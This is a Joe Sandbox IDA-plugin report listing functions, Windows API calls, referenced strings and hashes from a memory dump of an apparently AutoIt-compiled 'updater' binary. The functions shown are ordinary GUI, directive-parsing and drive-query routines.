API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 5aaa60678cc2a1391d30de5b6224a3bf8eb9ec0427883380d8f2448481389867
Instruction ID: cc982f667a3117776e2857b95133d0734b69c4e4aae0b0edcfe8c6f15112f9a9
Opcode Fuzzy Hash: 5aaa60678cc2a1391d30de5b6224a3bf8eb9ec0427883380d8f2448481389867
Instruction Fuzzy Hash: 2DA17C72408701AFDB1A9F64DC08A6B7BADFF8A321F100B19F962961E0D731D944CF92

Function 00312FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00313072
DeleteObject.GDI32(00000000), ref: 003130B8
DeleteObject.GDI32(00000000), ref: 003130C3
DestroyIcon.USER32(00000000,?,?,?), ref: 003130CE
DestroyWindow.USER32(00000000,?,?,?), ref: 003130D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0034C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0034C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0034CBDE

Part of subcall function 00311F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312412,?,00000000,?,?,?,?,00311AA7,00000000,?), ref: 00311F76

SendMessageW.USER32(?,00001053), ref: 0034CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0034CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034CC53

Strings

0, xrefs: 0034CA72

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 81d60f6e1937e496822fe9159666705c686e6d585d5d3d136d95c6b52dc6e228
Instruction ID: 9eb866ff39ce5ab70500c91dba3cfb69413b2103174c52dee9c69fb1c21b311a
Opcode Fuzzy Hash: 81d60f6e1937e496822fe9159666705c686e6d585d5d3d136d95c6b52dc6e228
Instruction Fuzzy Hash: 4C12AD30615201EFDB6ACF24C884BA9BBE5FF09300F155569E48ACF662C731ED96CB91

Function 003227FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

__wcsnicmp.LIBCMT ref: 0032286A
__wcsnicmp.LIBCMT ref: 0032287E
__wcsnicmp.LIBCMT ref: 00322896
__wcsnicmp.LIBCMT ref: 003228AE
__wcsnicmp.LIBCMT ref: 003228C6
__wcsnicmp.LIBCMT ref: 003228DE
__wcsnicmp.LIBCMT ref: 003228F6
__wcsnicmp.LIBCMT ref: 0032290A
__wcsnicmp.LIBCMT ref: 00322948
__wcsnicmp.LIBCMT ref: 0032295C
__wcsnicmp.LIBCMT ref: 00322970
__wcsnicmp.LIBCMT ref: 00322984

Strings

Bad directive syntax error, xrefs: 0035FBD3, 0035FBF0
#OnAutoItStartRegister, xrefs: 003228A8
#include-once, xrefs: 003228C0
#include, xrefs: 003228D8
', xrefs: 0035FB9F
#requireadmin, xrefs: 00322890
#notrayicon, xrefs: 00322878
Cannot parse #include, xrefs: 0035FCE5
#comments-end, xrefs: 0032296A
#pragma compile, xrefs: 00322864
Unterminated group of comments, xrefs: 0035FCFA
#comments-start, xrefs: 003228F0, 00322942
#ce, xrefs: 0032297E
#cs, xrefs: 00322904, 00322956
", xrefs: 0035FB89

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: f1a058428fae2d2ea8f6bf4aa2d64c041c604d1d1b7b2c60539a3b0f748eeb09
Instruction ID: 2270109d995b4a930e3b9e073136a210284987c688a6865a41e0d263b5ccec87
Opcode Fuzzy Hash: f1a058428fae2d2ea8f6bf4aa2d64c041c604d1d1b7b2c60539a3b0f748eeb09
Instruction Fuzzy Hash: EFA18B31A00219BBCB27AF60EC82FAF7778AF45740F004128FC05AA2A2EB71DA55D750

Function 0037B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037B361
GetDriveTypeW.KERNEL32(?,003A2C4C,?,\\.\,003A0980), ref: 0037B43E
SetErrorMode.KERNEL32(00000000,003A2C4C,?,\\.\,003A0980), ref: 0037B59C

Strings

USB, xrefs: 0037B533
Fibre, xrefs: 0037B52C
iSCSI, xrefs: 0037B541
SSD, xrefs: 0037B4C9
Fixed, xrefs: 0037B486
SSA, xrefs: 0037B525
FileBackedVirtual, xrefs: 0037B56B
Network, xrefs: 0037B47C
\\.\, xrefs: 0037B3B3
RAMDisk, xrefs: 0037B468
MMC, xrefs: 0037B55D
1394, xrefs: 0037B51E
ATA, xrefs: 0037B517
SAS, xrefs: 0037B548
Removable, xrefs: 0037B490
CDROM, xrefs: 0037B472
ATAPI, xrefs: 0037B510
Unknown, xrefs: 0037B45E, 0037B502
PhysicalDrive, xrefs: 0037B3EA
SCSI, xrefs: 0037B509
RAID, xrefs: 0037B53A
Virtual, xrefs: 0037B564
SATA, xrefs: 0037B54F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 314fcde57aa18170d2eec9956b90d35fbe8830b8ced9203f5caf2b06b21300b7
Instruction ID: 99bb5e428f9eafaadffe4e48499f33852a22892434232bc018660b877c11dc82
Opcode Fuzzy Hash: 314fcde57aa18170d2eec9956b90d35fbe8830b8ced9203f5caf2b06b21300b7
Instruction Fuzzy Hash: 9C516430B44209EBC727DB20CD42FA9F7B5AF46350B24C41DF80AEB691D779AE819B51

Function 0039A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0039A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0039A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 0039A1CC

Strings

0, xrefs: 0039A209

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 1a73266ddb3558af3ae6623b93fd410796abbd7f0459c01f82cc7667484186e2
Instruction ID: f7f6b0665f835958dc6368017ecdf21175b8fe6f210140ecce52ee513ae95d31
Opcode Fuzzy Hash: 1a73266ddb3558af3ae6623b93fd410796abbd7f0459c01f82cc7667484186e2
Instruction Fuzzy Hash: 2C02E230208B01AFDF1BCF14C849BAABBE8FF86314F05861DF995962A1C775D954CB92

Function 016DBE3D Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 016DBE46

Part of subcall function 016DBE05: GetProcAddress.KERNEL32(00000000), ref: 016DBE23

Strings

VarIdiv, xrefs: 016DBEEE
VarAdd, xrefs: 016DBE96
VarBstrFromCy, xrefs: 016DBFF6
VarDateFromStr, xrefs: 016DBFB4
VarI4FromStr, xrefs: 016DBF72
VarNeg, xrefs: 016DBE6A
VarMod, xrefs: 016DBF04
VarCyFromStr, xrefs: 016DBFCA
VarSub, xrefs: 016DBEAC
VarOr, xrefs: 016DBF30
VarNot, xrefs: 016DBE80
VariantChangeTypeEx, xrefs: 016DBE54
VarR8FromStr, xrefs: 016DBF9E
VarMul, xrefs: 016DBEC2
VarBoolFromStr, xrefs: 016DBFE0
VarCmp, xrefs: 016DBF5C
VarR4FromStr, xrefs: 016DBF88
VarBstrFromBool, xrefs: 016DC022
VarXor, xrefs: 016DBF46
VarBstrFromDate, xrefs: 016DC00C
oleaut32.dll, xrefs: 016DBE41
VarAnd, xrefs: 016DBF1A
VarDiv, xrefs: 016DBED8

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 1f9f61bd2a353131b7ea7e928f99d029a8eba3b7228edf395e871b3a8c68ad26
Instruction ID: 87f6c1051fa4f3df653c2132a10e6e1cb051e7d872aecd31ad3c9477147c18ac
Opcode Fuzzy Hash: 1f9f61bd2a353131b7ea7e928f99d029a8eba3b7228edf395e871b3a8c68ad26
Instruction Fuzzy Hash: 63414171E482095BD7146FAF7C4082B73EAFB9B650322410EA504CF24CEE32AD52C7AD

Function 0039AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0039AF51
SetTextColor.GDI32(?,?), ref: 0039AF55
GetSysColorBrush.USER32(0000000F), ref: 0039AF6B
GetSysColor.USER32(0000000F), ref: 0039AF76
CreateSolidBrush.GDI32(?), ref: 0039AF7B
GetSysColor.USER32(00000011), ref: 0039AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039AFA1
SelectObject.GDI32(?,00000000), ref: 0039AFB2
SetBkColor.GDI32(?,00000000), ref: 0039AFBB
SelectObject.GDI32(?,?), ref: 0039AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0039AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0039B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0039B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0039B0A4
DrawFocusRect.USER32(?,?), ref: 0039B0AF
GetSysColor.USER32(00000011), ref: 0039B0BD
SetTextColor.GDI32(?,00000000), ref: 0039B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0039B0D9
SelectObject.GDI32(?,0039AC1F), ref: 0039B0F0
DeleteObject.GDI32(?), ref: 0039B0FB
SelectObject.GDI32(?,?), ref: 0039B101
DeleteObject.GDI32(?), ref: 0039B106
SetTextColor.GDI32(?,?), ref: 0039B10C
SetBkColor.GDI32(?,?), ref: 0039B116

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d0afe1e85d6e2e00e366d17928b1c07d71d3328a0942f2137315c8ebc877f5c7
Instruction ID: 59dd5bf02c28dcf8bebe2ece33995bace2660d4f974a5926b52c8b25c37515c3
Opcode Fuzzy Hash: d0afe1e85d6e2e00e366d17928b1c07d71d3328a0942f2137315c8ebc877f5c7
Instruction Fuzzy Hash: F8616CB1900218AFDF1A9FA4DC48EAEBB7DFF09320F114215F916AB2A1D7759940CF90

Function 00398FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003990EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003990FB
CharNextW.USER32(0000014E), ref: 0039912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0039916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00399181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00399192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003991AF
SetWindowTextW.USER32(?,0000014E), ref: 003991FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00399211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00399242
_memset.LIBCMT ref: 00399267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003992B0
_memset.LIBCMT ref: 0039930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00399339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00399391
SendMessageW.USER32(?,0000133D,?,?), ref: 0039943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00399460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003994AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003994D7
DrawMenuBar.USER32(?), ref: 003994E6
SetWindowTextW.USER32(?,0000014E), ref: 0039950E

Strings

0, xrefs: 00399478

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: dfab82c9880c4a52d5ab11aa5089b21a717dbe3f9e4f0dbac4bfe099e5382b0d
Instruction ID: e2907f572e8f7292316441866b6aa3f1efdcaa18288b99f178a10d356c3bcbe5
Opcode Fuzzy Hash: dfab82c9880c4a52d5ab11aa5089b21a717dbe3f9e4f0dbac4bfe099e5382b0d
Instruction Fuzzy Hash: E0E17D71900209ABDF229F58CC85FEE7BBCFF0A710F15815AF915AA291D7708A85DF60

Function 00394ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00395007
GetDesktopWindow.USER32 ref: 0039501C
GetWindowRect.USER32(00000000), ref: 00395023
GetWindowLongW.USER32(?,000000F0), ref: 00395085
DestroyWindow.USER32(?), ref: 003950B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003950DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003950F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0039511E
SendMessageW.USER32(?,00000421,?,?), ref: 00395133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00395146
IsWindowVisible.USER32(?), ref: 00395166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00395181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00395195
GetWindowRect.USER32(?,?), ref: 003951AD
MonitorFromPoint.USER32(?,?,00000002), ref: 003951D3
GetMonitorInfoW.USER32(00000000,?), ref: 003951ED
CopyRect.USER32(?,?), ref: 00395204
SendMessageW.USER32(?,00000412,00000000), ref: 0039526F

Strings

tooltips_class32, xrefs: 003950D3
0, xrefs: 00394FB2
(, xrefs: 003951E0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c7d4ebe8ae33969a09b44327f46c105f6b1bdb01db412ca0d8cf256294ddd1dc
Instruction ID: 87363308096ce29951f9ad7b1364d07dcfae1bd55269e72c571f2b011dd68205
Opcode Fuzzy Hash: c7d4ebe8ae33969a09b44327f46c105f6b1bdb01db412ca0d8cf256294ddd1dc
Instruction Fuzzy Hash: 9DB19C71604740AFDB0ADF64D884B6ABBE4FF89314F008A1CF5999B2A1D771EC45CB92

Function 0037498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0037499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003749C2
_wcscpy.LIBCMT ref: 003749F0
_wcscmp.LIBCMT ref: 003749FB
_wcscat.LIBCMT ref: 00374A11
_wcsstr.LIBCMT ref: 00374A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00374A38
_wcscat.LIBCMT ref: 00374A81
_wcscat.LIBCMT ref: 00374A88
_wcsncpy.LIBCMT ref: 00374AB3

Strings

04090000, xrefs: 00374A6E
StringFileInfo\, xrefs: 00374A0B
\VarFileInfo\Translation, xrefs: 00374A30
%u.%u.%u.%u, xrefs: 00374B16
DefaultLangCodepage, xrefs: 00374A9B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0fbd9c90d0ab8b3ff5e3e6e5b50644514475142aab18fa4ad9217ed9a0efacdd
Instruction ID: f0bbf7aedff2cdaa99120fc4619788a45f291f91813fdc8aa40b60fa852a5f29
Opcode Fuzzy Hash: 0fbd9c90d0ab8b3ff5e3e6e5b50644514475142aab18fa4ad9217ed9a0efacdd
Instruction Fuzzy Hash: 5B413672604214BADB27B7348C87EBFB77CDF46720F004459F909EA192EB35EA0197A5

Function 00330429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

GetForegroundWindow.USER32(003A0980,?,?,?,?,?), ref: 003304E3
IsWindow.USER32(?), ref: 003666BB

Strings

REGEXPCLASS, xrefs: 00366506
ALL, xrefs: 00366622
INSTANCE, xrefs: 003665FA
LAST, xrefs: 00366472
REGEXPTITLE, xrefs: 003664B4
HANDLE, xrefs: 0036649E
CLASS, xrefs: 003664E5
TITLE, xrefs: 00366650
ACTIVE, xrefs: 00366488

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: f446de11e1bf7e9caaac015a761134fbac7d57ef04d21a39ed8b12b16e08ea8f
Instruction ID: dc63d973c3166612562914c28d611b311adbfd1382e0adb76c53143d70275ef7
Opcode Fuzzy Hash: f446de11e1bf7e9caaac015a761134fbac7d57ef04d21a39ed8b12b16e08ea8f
Instruction Fuzzy Hash: ADD1D630104602DBCB0BEF20D5929AAFBB8FF55384F108A1DF4968B566DB30E959CB91

Function 0039441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003944AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0039456C

Strings

SELECTCLEAR, xrefs: 003945EB
GETITEMCOUNT, xrefs: 003944DE
GETSELECTED, xrefs: 0039469A
GETSUBITEMCOUNT, xrefs: 003944F7
FINDITEM, xrefs: 003946DF
ISSELECTED, xrefs: 00394577
SELECTINVERT, xrefs: 0039463C
GETSELECTEDCOUNT, xrefs: 0039454F
GETTEXT, xrefs: 00394515
SELECT, xrefs: 00394606
VIEWCHANGE, xrefs: 0039472B
DESELECT, xrefs: 0039465A
SELECTALL, xrefs: 003945D3

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: f6cf9d3c40d28a8e093aa4487dbbecafd61c3241463409bb49962b79ad97c060
Instruction ID: 6299c0c0636333ac92039d6b529b6bbd4006e718d8a0fee1f0c3ae7eb46ba8a4
Opcode Fuzzy Hash: f6cf9d3c40d28a8e093aa4487dbbecafd61c3241463409bb49962b79ad97c060
Instruction Fuzzy Hash: DBA191702146019FCB1AEF64C961E6AB3A5EF89314F11892CF8569F7D2DB30EC06CB51

Function 003856C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 003856E1
LoadCursorW.USER32(00000000,00007F8A), ref: 003856EC
LoadCursorW.USER32(00000000,00007F00), ref: 003856F7
LoadCursorW.USER32(00000000,00007F03), ref: 00385702
LoadCursorW.USER32(00000000,00007F8B), ref: 0038570D
LoadCursorW.USER32(00000000,00007F01), ref: 00385718
LoadCursorW.USER32(00000000,00007F81), ref: 00385723
LoadCursorW.USER32(00000000,00007F88), ref: 0038572E
LoadCursorW.USER32(00000000,00007F80), ref: 00385739
LoadCursorW.USER32(00000000,00007F86), ref: 00385744
LoadCursorW.USER32(00000000,00007F83), ref: 0038574F
LoadCursorW.USER32(00000000,00007F85), ref: 0038575A
LoadCursorW.USER32(00000000,00007F82), ref: 00385765
LoadCursorW.USER32(00000000,00007F84), ref: 00385770
LoadCursorW.USER32(00000000,00007F04), ref: 0038577B
LoadCursorW.USER32(00000000,00007F02), ref: 00385786
GetCursorInfo.USER32(?), ref: 00385796
GetLastError.KERNEL32(00000001,00000000), ref: 003857C1

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 6c4b0a247579ef29570630406c7995ea11fb0d1910d64f0867dc301b9f427355
Instruction ID: 68c4ae216ab840938cfe8d3e5ca46672b3e1db2ea6ff637a498b7d901bb7e2b8
Opcode Fuzzy Hash: 6c4b0a247579ef29570630406c7995ea11fb0d1910d64f0867dc301b9f427355
